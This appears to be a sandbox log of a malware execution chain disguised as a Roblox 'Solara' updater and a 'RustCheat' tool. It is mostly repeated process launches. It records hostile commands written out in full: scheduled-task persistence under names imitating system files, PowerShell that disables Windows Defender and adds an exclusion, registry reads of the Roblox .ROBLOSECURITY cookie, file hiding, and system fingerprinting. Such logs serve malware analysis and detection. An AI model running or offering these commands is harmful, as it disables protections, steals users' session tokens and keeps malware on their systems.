schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\hostNet\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\hostNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\hostNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 5 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GP6pjYPh8x.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\hostNet\smss.exe

"C:\hostNet\smss.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

